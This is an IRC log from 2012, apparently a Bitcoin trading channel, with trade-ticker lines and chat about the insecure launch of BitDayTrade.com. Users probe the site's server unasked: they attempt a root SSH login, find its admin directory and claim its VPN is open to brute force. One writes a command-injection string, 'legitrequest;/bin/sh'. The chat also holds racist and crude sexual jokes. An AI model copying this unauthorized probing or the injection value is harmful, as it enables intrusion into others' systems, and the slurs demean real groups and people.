@ 0.9999 = 1.9998 BTC [+] Aug 16 11:15:36 [GLBSE] [BITBOND] 2 @ 0.398 = 0.796 BTC [-] Aug 16 11:18:03 [MPEX] [F.GIGA.ETF] 551 @ 0.00113771 = 0.6269 BTC [+] Aug 16 11:18:05 [MPEX] [F.GIGA.ETF] 3268 @ 0.00113791 = 3.7187 BTC [+] Aug 16 11:18:06 [MPEX] [F.GIGA.ETF] 8681 @ 0.00113797 = 9.8787 BTC [+] Aug 16 11:20:41 [MPEX] [F.GIGA.ETF] 2804 @ 0.00113753 = 3.1896 BTC [-] Aug 16 11:20:42 [MPEX] [F.GIGA.ETF] 6000 @ 0.0011183 = 6.7098 BTC [-] Aug 16 11:20:44 [MPEX] [F.GIGA.ETF] 5798 @ 0.0011145 = 6.4619 BTC [-] Aug 16 11:20:45 [MPEX] [F.GIGA.ETF] 5458 @ 0.00111081 = 6.0628 BTC [-] Aug 16 11:20:46 [MPEX] [F.GIGA.ETF] 7355 @ 0.00110983 = 8.1628 BTC [-] Aug 16 11:20:47 [MPEX] [F.GIGA.ETF] 585 @ 0.0011039 = 0.6458 BTC [-] Aug 16 11:21:44 [MPEX] [F.GIGA.ETF] 5555 @ 0.0011039 = 6.1322 BTC [-] Aug 16 11:21:44 [MPEX] [F.GIGA.ETF] 18600 @ 0.00107525 = 19.9997 BTC [-] Aug 16 11:21:46 [MPEX] [F.GIGA.ETF] 511 @ 0.00106054 = 0.5419 BTC [-] Aug 16 11:21:47 [MPEX] [F.GIGA.ETF] 5800 @ 0.00103862 = 6.024 BTC [-] Aug 16 11:21:48 [MPEX] [F.GIGA.ETF] 14534 @ 0.0010386 = 15.095 BTC [-] Aug 16 11:23:19 [MPEX] [S.MPOE] 23500 @ 0.00038925 = 9.1474 BTC [-] Aug 16 11:23:20 [MPEX] [S.MPOE] 24681 @ 0.00037445 = 9.2418 BTC [-] Aug 16 11:23:22 [MPEX] [S.MPOE] 41400 @ 0.00037424 = 15.4935 BTC [-] Aug 16 11:23:23 [MPEX] [S.MPOE] 7800 @ 0.00037327 = 2.9115 BTC [-] Aug 16 11:23:24 [MPEX] [S.MPOE] 30336 @ 0.00036389 = 11.039 BTC [-] Aug 16 11:23:25 [MPEX] [S.MPOE] 31400 @ 0.00036134 = 11.3461 BTC [-] Aug 16 11:23:25 [MPEX] [S.MPOE] 43800 @ 0.00035927 = 15.736 BTC [-] Aug 16 11:23:26 [MPEX] [S.MPOE] 52047 @ 0.00034738 = 18.0801 BTC [-] Aug 16 11:23:28 [MPEX] [S.MPOE] 30036 @ 0.00034723 = 10.4294 BTC [-] Aug 16 11:24:31 [MPEX] [F.GIGA.ETF] 2672 @ 0.0010386 = 2.7751 BTC [-] Aug 16 11:24:32 [MPEX] [F.GIGA.ETF] 8188 @ 0.00103797 = 8.4989 BTC [-] Aug 16 11:24:34 [MPEX] [F.GIGA.ETF] 640 @ 0.001 = 0.64 BTC [-] Aug 16 11:28:28 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9901 = 3.9604 BTC [-] Aug 16 11:28:30 [GLBSE] [TYGRR.BOND-P] 9 @ 0.99 = 8.91 BTC [-] Aug 16 11:28:31 [GLBSE] [TYGRR.BOND-P] 7 @ 0.99 = 6.93 BTC [-] Aug 16 11:30:37 [MPEX] [S.MPOE] 13200 @ 0.0003965 = 5.2338 BTC [+] Aug 16 11:33:39 [MPEX] [O.HASH.P10TH] 150000 @ 0.02747519 = 4121.2785 BTC [-] Aug 16 11:39:23 wow that last one was a big one Aug 16 11:39:50 [MPEX] [B.MPCD.C] 78500 @ 0.001 = 78.5 BTC Aug 16 11:40:28 [MPEX] [O.BTCUSD.C090T] 2 @ 0.30232322 = 0.6046 BTC [-] Aug 16 11:47:23 : ▃▃▃ Aug 16 11:47:35 I mean... Aug 16 11:47:38 :███ Aug 16 11:49:04 Someone expects to be selling a lot of hashing Aug 16 11:49:15 Mircea... Aug 16 11:50:55 [MPEX] [O.BTCUSD.P100N] 3 @ 0.13485739 = 0.4046 BTC [-] Aug 16 11:51:17 hehe Aug 16 11:52:34 sup Aug 16 11:53:36 arf arf Aug 16 11:54:03 anyone had a look at the front page of the bitcoin subreddit lately http://reddit.com/r/Bitcoin Aug 16 11:54:37 Bitdaytrade.com developer is a genius - he has been able to circumvent the max 21 million bitcoins limit. Now just have to wait 24 hours to withdraw. Aug 16 11:54:38 that ? Aug 16 11:54:59 i don't usually read reddit, it strikes me as about on par with bitcointalk, intellectually. Aug 16 11:55:00 Thats the funniest one Aug 16 11:55:24 So bitdaytrade is up? Aug 16 11:55:32 tesla museum. actually, there's a tesla museum in belgrade, i visited it. Aug 16 11:55:33 should be Aug 16 11:55:42 they must have over 21 million coins Aug 16 11:55:47 So people trading on margin now? Aug 16 11:55:50 BitDayTrade.com operator has already lost 4000BTC before Aug 16 11:56:08 is this really different from bitcoinica ? how ? Aug 16 11:56:21 I think it's the same thing Aug 16 11:56:29 I don't know really Aug 16 11:56:55 it looks like the same thing. Aug 16 11:56:56 who is he Aug 16 11:57:16 oh my god Aug 16 11:57:18 it is bitcoinica Aug 16 11:57:23 the bitcoinica src was released Aug 16 11:57:31 i cant believe someone would attempt such a blatent rip off?! Aug 16 11:57:43 haha is it actually based on the bitcoinica source ? Aug 16 11:57:51 just diff css etc ? Aug 16 11:58:09 I can't believe this. It's too funny to be true. Aug 16 11:58:19 "Over the last two decades cybercrime has matured from the early days of curiosity-driven hackers and pranksters to a fully fledged industry. " fuck compuerworld. Aug 16 11:58:25 who do they take themselves for ? Aug 16 11:58:26 i just emailed him Aug 16 11:58:28 asking what the fuck Aug 16 11:58:34 well Aug 16 11:58:36 more like Aug 16 11:58:40 buncha losers sitting in an office typing up crap nobody reads about things they don;'t understand. Aug 16 11:58:44 'Is this based on the Bitcoinica trading engine?' Aug 16 11:58:51 Bitcoinica wasn't even the best engine Aug 16 11:58:54 to reuse it would be dumb Aug 16 11:58:54 Short answer: No. Aug 16 11:58:57 I don't think so Aug 16 11:59:00 Long answer: Yeeesssssss Aug 16 11:59:02 the only reason they had market share was cause htey were the first Aug 16 11:59:03 read the other post Aug 16 11:59:04 lol Harvey00 Aug 16 11:59:10 i dont read posts Aug 16 11:59:14 i email and use IRC Aug 16 11:59:18 posts can fuck right off Aug 16 11:59:22 rg actually the reason they had market share was cause they had css. Aug 16 11:59:22 i hate the forum Aug 16 11:59:24 seems to be from kronos.io Aug 16 11:59:36 nefario: eh lets just see what the author says Aug 16 11:59:48 kronos was the thing kludge/owens/etc were working on ? Aug 16 11:59:49 Well kronos.io is not going to have a good launch now Aug 16 12:00:04 [james@elephant ~]$ telnet bitdaytrade.com 22 Aug 16 12:00:04 Trying 109.74.193.147... Aug 16 12:00:04 Connected to bitdaytrade.com. Aug 16 12:00:04 Escape character is '^]'. Aug 16 12:00:04 SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6 Aug 16 12:00:17 AND hosted on linode Aug 16 12:00:19 http://www.reddit.com/r/Bitcoin/comments/yb89v/bitdaytradecom_operator_has_already_lost_4000btc/ Aug 16 12:00:21 [MPEX] [O.BTCUSD.P160T] 2 @ 0.33464076 = 0.6693 BTC [-] Aug 16 12:00:23 you've got to be shitting me Aug 16 12:00:25 ahaha WIN Aug 16 12:00:28 this is setup EXACTLY like bitcoinica Aug 16 12:00:30 winwinwinwinwinwinwinwin Aug 16 12:00:45 theres a PPTP VPN on it too Aug 16 12:00:55 open to the public Aug 16 12:01:07 Whoa Aug 16 12:01:07 [MPEX] [O.BTCUSD.C110T] 250 @ 0.23990007 = 59.975 BTC [+] Aug 16 12:01:09 well sign in there Aug 16 12:01:14 They actually hosted it on Linode? Aug 16 12:01:16 Again!? Aug 16 12:01:18 and help process that other guys withdrawal Aug 16 12:01:21 linode is solid. Aug 16 12:01:27 rock solid Aug 16 12:01:34 Not in the case of Bitcoinica, eh? Aug 16 12:01:35 gypsum rock solid. Aug 16 12:01:40 lol Aug 16 12:01:45 Harvey00 your sarcasm detector is hosed. Aug 16 12:01:46 nice Aug 16 12:01:48 not only that Aug 16 12:01:52 did you host it on linode ? Aug 16 12:01:55 the PPTP implimentation on the host is vulnerable to a bruteforce attack Aug 16 12:02:00 that allows 200-300 passwords/sec Aug 16 12:02:02 to be bruteforced Aug 16 12:02:18 password model does nto work for btc finance. end of story, srsly. Aug 16 12:02:35 debug1: Next authentication method: password Aug 16 12:02:35 root@109.74.193.147's password: Aug 16 12:02:41 faaaaaaaaaaaaaaaaaaaaaaail Aug 16 12:02:55 It's good to see evolution happen instantly. Aug 16 12:03:05 This is Darwinism at its finest. Aug 16 12:03:25 well Aug 16 12:03:28 problem is nobody says "i lost my btc because i was an imbecile" Aug 16 12:03:29 better fail now Aug 16 12:03:30 than later Aug 16 12:03:34 everybody blames the vague hacker. Aug 16 12:03:48 really? Aug 16 12:03:54 I think most blame the operators Aug 16 12:03:56 while the hacker lives it up on a cruise ship Aug 16 12:04:01 or that. Aug 16 12:04:13 I think most people admire the hackers for holding stupidity accountable. Aug 16 12:04:14 in this case of bitcoinica redux on linode tho... wellll... Aug 16 12:04:18 operators kinda should be blamed. Aug 16 12:04:43 oh he's commented on the greater than 21million BTC thing Aug 16 12:04:45 > Explanation: my friend was able to find a bug, which allowed him to trade his free 0.1 BTC to more than 25 million BTC. After he found out that there is 24 hour waiting time before withdraw, he realized that he might not get that money... Aug 16 12:04:55 You don't have permission to access /app/admin/ on this server. Aug 16 12:04:57 woot Aug 16 12:05:01 found the admin dir Aug 16 12:05:08 hahaha Aug 16 12:05:10 Wait Aug 16 12:05:12 lol this is so funny Aug 16 12:05:17 Are they running the server apps as root? Aug 16 12:05:26 Are they running as fucking root? lol Aug 16 12:05:29 depends Aug 16 12:05:37 look Aug 16 12:05:38 is there a proxy in front? Aug 16 12:05:40 if not Aug 16 12:05:43 then yes Aug 16 12:05:46 it's running as root Aug 16 12:05:48 give me a few minutes. Aug 16 12:05:51 wait. Aug 16 12:05:53 waitwait. Aug 16 12:05:59 wait Aug 16 12:05:59 apache runs as root ? Aug 16 12:06:03 no Aug 16 12:06:06 as user www Aug 16 12:06:10 apache does run as root Aug 16 12:06:12 but at this standard Aug 16 12:06:16 o gtfo Aug 16 12:06:19 it setuid's to a non priv user Aug 16 12:06:22 to serve out content Aug 16 12:06:25 ah Aug 16 12:06:27 my bad Aug 16 12:06:39 so it just drops privs Aug 16 12:06:42 for anything important Aug 16 12:06:54 >apache Aug 16 12:06:55 rg, i'll cut you a deal : for every million btc's you get on the guy;'s site i'll credit you 1 satoshi Aug 16 12:07:00 up to a limit of 10 btc. Aug 16 12:07:05 WHY WOULD YOU RUN APACHE WITH FINANCIALS Aug 16 12:07:06 if i find anything Aug 16 12:07:09 i will be emailing the admin Aug 16 12:07:12 without saying anything here Aug 16 12:07:22 but if i find less critical comical shit Aug 16 12:07:24 i will post it her Aug 16 12:07:39 Harvey00 well ostensibly you havw to talk to a browser at some point. Aug 16 12:08:15 unless you want to do one of those really proprietary systems and have the client code on a rom chip in some purpose-made display thing. Aug 16 12:08:32 Well, you can have strict limits on what the client sends you. Aug 16 12:08:37 Reject everything else. Aug 16 12:08:38 that you can. Aug 16 12:08:41 nginx FTW Aug 16 12:09:34 You could even ban IPs that send too many suspicious requests. Aug 16 12:11:27 [MPEX] [O.HASH.P10TH] 133819 @ 0.02747269 = 3676.3679 BTC [-] Aug 16 12:12:21 [GLBSE] [DMC] 1 @ 0.063 BTC [-] Aug 16 12:12:22 [GLBSE] [DMC] 2 @ 0.05 = 0.1 BTC [-] Aug 16 12:12:23 [GLBSE] [DMC] 25 @ 0.05 = 1.25 BTC [-] Aug 16 12:12:40 [GLBSE] [TYGRR.BOND-P] 53 @ 0.99 = 52.47 BTC [-] Aug 16 12:12:55 [05:08] Well, you can have strict limits on what the client sends you. Aug 16 12:12:58 not exactly Aug 16 12:13:04 you should let the client send whatever they want Aug 16 12:13:08 [MPEX] [S.MPOE] 50000 @ 0.00037297 = 18.6485 BTC [-] Aug 16 12:13:09 its what you do with what they send that counts Aug 16 12:13:10 i mean Aug 16 12:13:19 someone can send legitrequest;/bin/sh Aug 16 12:13:29 obviously you take that and flush it Aug 16 12:13:35 [GLBSE] [TYGRR.BOND-P] 12 @ 0.98521 = 11.8225 BTC [-] Aug 16 12:13:38 blocking bad requests is just security through obscurity Aug 16 12:13:58 you just need to treat any input from the user as a potentially AIDS infected needle Aug 16 12:13:59 Well, it's one tool out of many. Aug 16 12:14:04 meh Aug 16 12:14:07 http://brucewagner.com/forum Aug 16 12:14:09 lol Aug 16 12:14:10 [GLBSE] [DMC] 46 @ 0.05 = 2.3 BTC [-] Aug 16 12:14:11 its on the same line as hiding all your windoze boxes behind a firewall Aug 16 12:14:17 its not *really* secure Aug 16 12:14:21 you might not get hacked at first Aug 16 12:14:27 but eventually a skilled hacker will tear you apart Aug 16 12:14:33 SO many places... appear secure remotely Aug 16 12:14:37 but once you get into the 10.x Aug 16 12:14:39 its a JOKE Aug 16 12:14:52 my box Aug 16 12:14:54 you mean 192.x ? Aug 16 12:14:54 is so secure Aug 16 12:14:57 I can't even use it Aug 16 12:15:09 welcome to bruce wagner's discussion community - after you register, send an email to bruce@brucewagner.com and include your username, in order to join Aug 16 12:15:16 this name is vaguely familiar. Aug 16 12:15:18 192.168.x is the same as 10.x Aug 16 12:15:21 mircea_popescu: most local networks firewall external only Aug 16 12:15:22 its a reserved subnet Aug 16 12:15:24 is he the gay guy with a youtube show ? Aug 16 12:15:29 yes Aug 16 12:15:32 10.x is a /8, 192.168 is a /16 Aug 16 12:15:36 a ok Aug 16 12:15:40 on both counts. Aug 16 12:15:46 people with huge networks use 10.x Aug 16 12:15:50 or if you're asian Aug 16 12:15:53 you just use a real subject Aug 16 12:15:54 haha Aug 16 12:15:55 er Aug 16 12:15:55 subnet Aug 16 12:16:04 and dont pay attention to the fact that you can never route to those IPs Aug 16 12:16:06 ever again Aug 16 12:16:06 racist internet Aug 16 12:16:15 facts, not racism Aug 16 12:16:20 factism. Aug 16 12:16:21 asians do not believe in reverse DNS Aug 16 12:16:31 photos of my desk, you want to look at them. https://dl.dropbox.com/u/3832397/Photos/2012/August/20120816_090349%280%29.jpg Aug 16 12:16:37 4ward DNS work lar Aug 16 12:16:38 r Aug 16 12:16:42 no for need to reverse DNS Aug 16 12:16:43 kekekeke Aug 16 12:16:51 Azelphur add gf tits. Aug 16 12:16:56 mircea_popescu: lol Aug 16 12:16:57 dishonorable hacker no find server Aug 16 12:16:59 reerse DNS Aug 16 12:17:00 kekekek Aug 16 12:17:02 lar Aug 16 12:17:11 dishonorable hacker ahaha Aug 16 12:17:19 Azelphur: Zoom in. Enhance. Aug 16 12:17:30 somebody set us up the trojan Aug 16 12:18:01 no wonder he writes python, he's got one of those keyboards. Aug 16 12:18:22 MoneyIsDebt: :P Aug 16 12:18:26 I started coding python because I'm a monty python fan. Aug 16 12:18:27 4 x 2560x1440 monitors there :D Aug 16 12:18:32 As good a reason as any.... Aug 16 12:18:54 MoneyIsDebt: love me some python :) Aug 16 12:19:21 import ni; Aug 16 12:19:25 Don't I look great... when my picture is this small... Aug 16 12:19:25 You've (almost certainly inadvertently) stumbled upon my contact page... Aren't you lucky! :) You might know me from one of my venues, but feel free to roam around and explore some of the other things I'm into as well. And, of course, please don't hesitate to contact me. I'm very friendly, and I rarely bite (hard)... Aug 16 12:19:32 people need better elevator speeches srsly. Aug 16 12:19:43 Who the hell is Bruce Wagner? Aug 16 12:19:43 Bruce Wagner is a Hollywood film producer, an American novelist, actor, screenwriter, and director, known for his acerbic view of the Hollywood entertainment industry. Aug 16 12:19:52 so basically he's a stripper ? Aug 16 12:20:54 Yes Aug 16 12:20:58 A Bitcoin stripper Aug 16 12:21:05 who advertises MyBitcoin Aug 16 12:21:14 and lets everybody lose their money on it Aug 16 12:21:19 ok this is too funny. some guy's name actually is Shtylman ?! Aug 16 12:23:46 [GLBSE] [BDT] 3 @ 1.0301 = 3.0903 BTC [-] Aug 16 12:24:07 Okay confirmed Aug 16 12:24:15 The wild trades are from BitDayTrade Aug 16 12:24:23 and they are probably broke already Aug 16 12:25:00 what wild trades? Aug 16 12:25:20 The 50 BTC 1 minute orders and sells Aug 16 12:25:27 BitDayTrade is done. Aug 16 12:25:36 o that's what it was ? Aug 16 12:26:02 oh Aug 16 12:26:04 ahah Aug 16 12:26:10 I thought it was something else Aug 16 12:26:13 Don't put no more than .01 BTC in there. Aug 16 12:26:14 fuck i want mybitcoin.com Aug 16 12:26:15 so badly Aug 16 12:26:15 how much did they amount to Aug 16 12:26:27 They are probably still sleeping Aug 16 12:26:37 Harvey00 but i mean if they sold btc they got usd nao, why'd they be broke ? Aug 16 12:27:03 Because they have obligations to the snot nosed traders wrecking the system. Aug 16 12:27:57 Broke? Done? With so many gullible depositors, are you sure it's not planned? Why, seeing how easy it is to setup something insecure, why not do that and run with the money right away? Aug 16 12:27:58 [MPEX] [S.MPOE] 13200 @ 0.00038793 = 5.1207 BTC [+] Aug 16 12:27:59 [MPEX] [S.MPOE] 46500 @ 0.0003965 = 18.4373 BTC [+] Aug 16 12:28:00 o i c what you mean. Aug 16 12:28:24 No more is the need for ??? steps between profit Aug 16 12:28:39 [MPEX] [S.MPOE] 10100 @ 0.00037297 = 3.767 BTC [-] Aug 16 12:28:40 [MPEX] [S.MPOE] 7261 @ 0.00034723 = 2.5212 BTC [-] Aug 16 12:28:42 [MPEX] [S.MPOE] 22639 @ 0.00033437 = 7.5698 BTC [-] Aug 16 12:28:54 1. Bitcoinica > 2. Profit > 3. Bitdaytrade > 4. Profit > 5. etcetcetc Aug 16 12:28:54 lol BTC-Mining 1. profit 2. profit 3. profit. Aug 16 12:29:37 With such anonymity and bad security chained wallets/trading platforms... Aug 16 12:30:14 How easy would it be to change name each time and create a "new" wallet/trading platform? Leave it completly unsecure in all appearance. Aug 16 12:30:24 Blame a hack, run with money, create a new? Aug 16 12:30:47 People will eventually get standards Aug 16 12:31:03 They would have needed that last year Aug 16 12:31:22 we have standards. wot. gpg. etc. Aug 16 12:31:59 http://www.youtube.com/watch?v=F7SsavHX6tc&feature=player_embedded Aug 16 12:32:04 this thing is pure comedy. Aug 16 12:32:23 we don't need standards as much as we need better hats Aug 16 12:32:24 [GLBSE] [BDT] 25 @ 1.03 = 25.75 BTC [-] Aug 16 12:32:25 [GLBSE] [BDT] 1 @ 1.0202 BTC [-] Aug 16 12:32:26 [GLBSE] [BDT] 25 @ 1.02 = 25.5 BTC [-] Aug 16 12:32:27 [GLBSE] [BDT] 19 @ 1.011 = 19.209 BTC [-] Aug 16 12:33:23 oh dear Aug 16 12:33:32 news is getting to shareholders Aug 16 12:34:05 eh ? Aug 16 12:35:11 glbse is slow. now i can't check up wth bdt is. Aug 16 12:35:31 BitDayTrade Fixed Interest Bond 3% Week a ok. Aug 16 12:36:17 mircea Aug 16 12:36:18 The funds raised from issuing these bonds will be used for the development of the issuer's margin trading platformhttps://bitdaytrade.com/ Aug 16 12:36:24 tell that asshole nefario to drop the portugal host Aug 16 12:36:25 this is pretty cool. can i short them ? :D Aug 16 12:36:28 that all the boxes tunnel to Aug 16 12:36:34 i thoughty you hosted him ? Aug 16 12:36:37 we do Aug 16 12:36:45 but it all tunnels to a host in portugal Aug 16 12:36:52 so its only as strong as its weakest link Aug 16 12:36:59 Well, if they actually worked on it... IT MIGHT be secure, but appear completly unsecure. All depends on what's done on the background. Aug 16 12:37:09 But honestly, I doubt that. Aug 16 12:37:33 BTC-Mining that sounds like something from the "trust me i know what i'm doing" comicbook Aug 16 12:37:47 so Aug 16 12:37:51 this guy in -otc starts chatting Aug 16 12:37:54 come to find out Aug 16 12:37:56 Would be better to have obfuscation for the sake of not attracting bad traffic too Aug 16 12:37:58 hes the owner of a site we use *every* day Aug 16 12:37:59 rg Aug 16 12:38:05 you be full of shieeeeet Aug 16 12:38:08 we = my household Aug 16 12:38:11 what site be that ? Aug 16 12:38:13 GLBSE is not in portugal Aug 16 12:38:17 nzbsrus Aug 16 12:38:17 .... anymore Aug 16 12:38:25 nefario: its still slow and its not in portugal? Aug 16 12:38:27 that's horrible Aug 16 12:38:42 it's slow because we've got a shitonne of bots Aug 16 12:38:56 was recently sped up Aug 16 12:38:59 so Aug 16 12:39:01 will be more soon as well Aug 16 12:39:06 lets upgrade you to a dual E5 Aug 16 12:39:08 with 128GB ram Aug 16 12:39:15 LSI 9260 raid controller Aug 16 12:39:16 So who's that guy in otc? What's his website? Aug 16 12:39:22 with 4x1TB RE4 disks Aug 16 12:39:34 that's what cal2.vm.bitvps.com is Aug 16 12:39:48 you could partition it out into your whole infrastructure Aug 16 12:39:57 and the nice thing about a box like that is .. you grow into it Aug 16 12:40:03 you need another machine? you provision it Aug 16 12:40:06 no contacting the data center Aug 16 12:40:08 no stupid shit Aug 16 12:40:08 i like rg's salesmanship. Aug 16 12:40:11 you basically hold all the keys Aug 16 12:40:22 mircea_popescu: dude i hate to admit it, i am a great salesman Aug 16 12:40:23 are you in ny rg ? Aug 16 12:40:32 mircea_popescu: close, MA Aug 16 12:41:48 [GLBSE] [BFLS.RIG] 3 @ 0.95 = 2.85 BTC [-] Aug 16 12:43:32 [GLBSE] [DMC] 2 @ 0.07899999 = 0.158 BTC [+] Aug 16 12:45:30 [GLBSE] [BDT] 3 @ 1.0111 = 3.0333 BTC [+] Aug 16 12:45:50 [GLBSE] [BDT] 21 @ 1.011 = 21.231 BTC [-] Aug 16 12:46:22 [GLBSE] [BDT] 6 @ 1.01 = 6.06 BTC [-] Aug 16 12:46:32 BitVPS is clearly one of the best things to invest in. Aug 16 12:46:40 rg is just too awesome for his own good Aug 16 12:47:06 I don't invest in it but I've done some small work from time to time for rg Aug 16 12:47:26 If I work for it, maybe it would make sense to invest in it eh Aug 16 12:48:16 Yeah, as Marx said, the workers should own their means of production. ; ) Aug 16 12:48:48 BTC-Mining is my go-to Aug 16 12:48:52 for *anything* web related Aug 16 12:48:52 [GLBSE] [BDT] 3 @ 1.0101 = 3.0303 BTC [+] Aug 16 12:48:53 [GLBSE] [BDT] 4 @ 1.01 = 4.04 BTC [-] Aug 16 12:48:54 [GLBSE] [BDT] 6 @ 1 = 6 BTC [-] Aug 16 12:48:56 [GLBSE] [BDT] 12 @ 1 = 12 BTC [-] Aug 16 12:49:15 Harvey00 so buy his shares Aug 16 12:49:17 I wouldn't recommend server setup/security however, or advancing scripting (web development) Aug 16 12:49:36 advanced coding* Aug 16 12:50:35 I don't know much about that. I can help for almost anything else. Aug 16 12:51:03 or learn it on the fly =/ Aug 16 12:51:49 you need some CSS/PHP/HTML done? BTC-Mining is your guy Aug 16 12:52:05 i think he did everything for bitvps Aug 16 12:52:12 wait.. btc-mining, did you do the currnet bitvps.com template? Aug 16 12:52:13 he killed my auntie! Aug 16 12:52:18 Eh, not quite Aug 16 12:52:21 i think it was some random guy Aug 16 12:52:29 he translated it from a static HTML template to wordpress Aug 16 12:52:31 [GLBSE] [BDT] 13 @ 1 = 13 BTC [-] Aug 16 12:52:33 [GLBSE] [BDT] 35 @ 1 = 35 BTC [-] Aug 16 12:52:34 [GLBSE] [BDT] 1 @ 1 BTC [-] Aug 16 12:52:34 [GLBSE] [BDT] 5 @ 1 = 5 BTC [-] Aug 16 12:52:39 (which btc-mining can do as well) Aug 16 12:52:41 lol BDT is fucked Aug 16 12:52:47 every last trade has been a - Aug 16 12:52:47 lol Aug 16 12:52:49 !ticker bdt Aug 16 12:52:52 [GLBSE:BDT] [Bid: 1] [Ask: 1.06979999] [Spread: 0.06979999] [Last: 1] [24hVol: 194.66369993] [7dAvg: 1.04599856] Aug 16 12:53:36 I vaguely integrated the Wordpress template for Bitvps to plain html/css to frame around bitvps's WHMCS client area Aug 16 12:53:38 [MPEX] [F.GIGA.ETF] 7205 @ 0.00100069 = 7.21 BTC [+] Aug 16 12:53:39 [MPEX] [F.GIGA.ETF] 2795 @ 0.00111824 = 3.1255 BTC [+] Aug 16 12:53:47 yeah Aug 16 12:53:54 i forget who did the original template Aug 16 12:53:58 i dont even think he exists anymore Aug 16 12:54:03 ... Aug 16 12:54:03 btc-mining: get ready Aug 16 12:54:09 soon youll have to do http://wallet.bitvps.com Aug 16 12:54:32 Sounds good =/ Aug 16 12:54:33 and its gonna be a HUGE pain in the ass Aug 16 12:54:34 :) Aug 16 12:54:45 check index.php's CSS Aug 16 12:54:48 Aug 16 12:54:48 lol rg rubbed off his prev designer. Aug 16 12:54:50 Why would it now? Aug 16 12:55:02 btc-mining: cause its your favorite, wordpress Aug 16 12:55:03 :) Aug 16 12:55:16 I hate CMS Aug 16 12:55:32 Unless it's barebone PHP Aug 16 12:55:46 As in PHP sepatates the template from the page Aug 16 12:55:50 http://wallet.bitvps.com/wp-content/themes/Karma/style.css Aug 16 12:55:51 separates* Aug 16 12:55:55 CMS pisses me off Aug 16 12:56:03 I always end up going to notepad in the end Aug 16 12:56:14 You still need a barebone CMS Aug 16 12:56:22 jesus god wagner is hitting on the bitfloor kid on the show Aug 16 12:56:24 WHAT THE FUCK Aug 16 12:56:42 Acka a dynamic page containing the template and loading the content. Aug 16 12:56:43 ha Aug 16 12:56:45 hes asian isnt he Aug 16 12:56:46 Wagner always has a rape face. Aug 16 12:56:50 bruce LOVES the thai lady boys Aug 16 12:57:00 remember when thye found his posts on the thai ladyboy website? Aug 16 12:57:03 You don't need the CMS tho, unless you can't code/place elements for each subpage Aug 16 12:57:22 no lol. Aug 16 12:57:33 i love wordpress Aug 16 12:57:35 its just too easy Aug 16 12:57:46 "i love btifloor, simplicity. less is more" Aug 16 12:57:57 http://wallet.bitvps.com/?page_id=5017 Aug 16 12:57:59 ugh Aug 16 12:58:00 search bar Aug 16 12:58:00 and im thinking yeah, it has the volume of a lithe 15 yo anorexic. less is more! Aug 16 12:58:03 i need to axe that Aug 16 12:58:10 Well in any case, goodbye, I'm off for the day Aug 16 13:06:55 [GLBSE] [BIB.PIRATE] 1 @ 1 BTC [+] Aug 16 13:14:37 [MPEX] [F.GIGA.ETF] 1500 @ 0.00111824 = 1.6774 BTC [+] Aug 16 13:16:11 [GLBSE] [BIB.PIRATE] 1 @ 1 BTC [+] Aug 16 13:30:52 Guys BitDayTrade's passwords and email are out in the open Aug 16 13:31:00 Do not do business there Aug 16 13:31:04 or you are in for a bad time Aug 16 13:31:18 lol. Aug 16 13:31:20 that is not a surprise Aug 16 13:31:38 [MPEX] [S.BVPS] 550 @ 0.00378408 = 2.0812 BTC [+] Aug 16 13:31:40 [MPEX] [S.BVPS] 39 @ 0.0037982 = 0.1481 BTC [+] Aug 16 13:31:41 [MPEX] [S.BVPS] 711 @ 0.0037991 = 2.7012 BTC [+] Aug 16 13:32:17 we were *just* talking about how poorly setup it is Aug 16 13:37:33 wow Aug 16 13:37:40 they already got hacked? Aug 16 13:40:33 as soon as I get somewhere to hedge they get hacked xD Aug 16 13:41:16 [GLBSE] [BITBOND] 1 @ 0.3901 BTC [-] Aug 16 13:43:38 yeah sad Aug 16 13:45:57 http://www.casascius.com/ Aug 16 13:46:02 donw for you guys as well?` Aug 16 13:46:21 [MPEX] [S.MPOE] 40400 @ 0.00038921 = 15.7241 BTC [+] Aug 16 13:47:36 [GLBSE] [BDT] 3 @ 1.0011 = 3.0033 BTC [+] Aug 16 13:47:38 [GLBSE] [BDT] 50 @ 1.001 = 50.05 BTC [-] Aug 16 13:47:39 [GLBSE] [BDT] 5 @ 1 = 5 BTC [-] Aug 16 13:48:36 [GLBSE] [TYGRR.BOND-P] 3 @ 0.9999 = 2.9997 BTC [+] Aug 16 13:51:29 DeaDTerra: be glad you figured it out now Aug 16 13:51:36 not after you had 1+ BTC in there Aug 16 13:51:53 [MPEX] [S.MPOE] 5820 @ 0.00038921 = 2.2652 BTC [+] Aug 16 13:58:58 who is behind that? Aug 16 14:00:10 Unsalted md5 passwords. What the fuck? Aug 16 14:00:17 Guys Aug 16 14:00:20 You know that when you hear that Aug 16 14:00:25 it was a setup, right? Aug 16 14:00:39 When you hear "unsalted md5 passwords" it is THIS CLOSE to criminal negligence Aug 16 14:01:00 Who wrote this shit Aug 16 14:01:43 I am designing a system right now where the user passwords encrypt their data individually , so that even if someone breaks into the system they can't do anything to the user accounts. Aug 16 14:02:05 It uses a two-part in-memory-only salt which means the system can't be brought up unless two people are logged in to type the salts at the same time Aug 16 14:02:13 Who uses unsalted md5 hashes? Aug 16 14:03:53 diablo's blog is down as well Aug 16 14:03:56 CONSPIRACY Aug 16 14:05:19 well this fucking sucks xD Aug 16 14:06:02 rallying prices, bearish GLBSE market and decrease in payouts from Pirate. With no way to hedge against the price increase, how the fuck am I going to be able to make a profit now... Aug 16 14:07:50 there are 3 choices- pirate- mining "turds"- and business's that never seem to work out.... Aug 16 14:08:42 DeaDTerra; Roll your fund into NYAN and work for me. Aug 16 14:11:29 buy bitvps shares Aug 16 14:11:59 if you actually own a decent amount of shares Aug 16 14:12:02 you will get a decent payout Aug 16 14:12:08 Right now the GLBSE market is looking shit. Aug 16 14:12:25 We have pirate which seems to be crashing, we have mining bonds that are crashing and we have mining operations which also are crashing. Aug 16 14:12:35 then we have Rebate and such projects which all get hacked and fail... Aug 16 14:12:36 fml Aug 16 14:13:30 out of all the options pirate has been the most reliable :) Aug 16 14:14:06 I have so many bitvps shares that it pays for my hosting. Aug 16 14:17:01 i'm considering starting a Bitcoin based banking operation Aug 16 14:17:15 based in Australia initially Aug 16 14:17:37 just reading up on legislative requirements Aug 16 14:18:25 looks like i need to raise $50m Aug 16 14:19:09 tier 1 capital Aug 16 14:22:22 only x50 than Diablo Aug 16 14:25:15 i'm thinking maybe just try to raise 10m on the assumption that prices will continue to rise Aug 16 14:25:41 [MPEX] [S.MPOE] 14513 @ 0.00035471 = 